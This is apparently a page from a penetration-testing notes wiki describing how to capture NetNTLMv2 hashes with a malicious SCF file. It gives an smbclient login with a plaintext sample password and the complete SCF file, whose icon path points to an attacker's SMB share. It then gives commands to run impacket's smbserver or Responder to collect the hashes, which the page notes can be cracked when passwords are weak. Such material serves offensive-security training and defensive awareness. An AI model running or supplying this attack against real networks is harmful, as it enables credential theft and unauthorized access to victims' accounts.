SCF Files

Imagine we have write permission to a shared folder, we could use it to save a .scf file, trick a user to access it and obtain its NetNTLMv2 hash. If its password is weak, we could obtain the plain text of it.

Access to Shared Folder

smbclient //10.10.10.10/payroll-2024 -U 'freed-om-corp.com\carlos.villamizar%NastAsya4475'

Create SCF file

[Shell]
Command=2
IconFile=\\10.10.10.20\mycompartida\quepasomirey.ico
[Taskbar]
Command=ToggleDesktop

Upload SCF file to Shared Folder

Serve the attacker Shared Folder

python3 /opt/impacket/examples/smbserver.py mycompartida $(pwd) -smb2support

And now we need to wait for an interaction with the payroll-2024 shared folder.

Waiting... ANDD if someone is interacting with the folder we will receive a NetNTLMv2 hash in our mycompartida shared folder.

Or using Responder.py

sudo python3 Responder.py -I eth0

Wait and once we detect an interaction with the folder:

PreviousTools to exploit AD things NextKerberos

Last updated 1 year ago

hashtagAccess to Shared Folder

hashtagCreate SCF file

hashtagUpload SCF file to Shared Folder

hashtagServe the attacker Shared Folder

hashtagOr using Responder.py

Access to Shared Folder

Create SCF file

Upload SCF file to Shared Folder

Serve the attacker Shared Folder

Or using Responder.py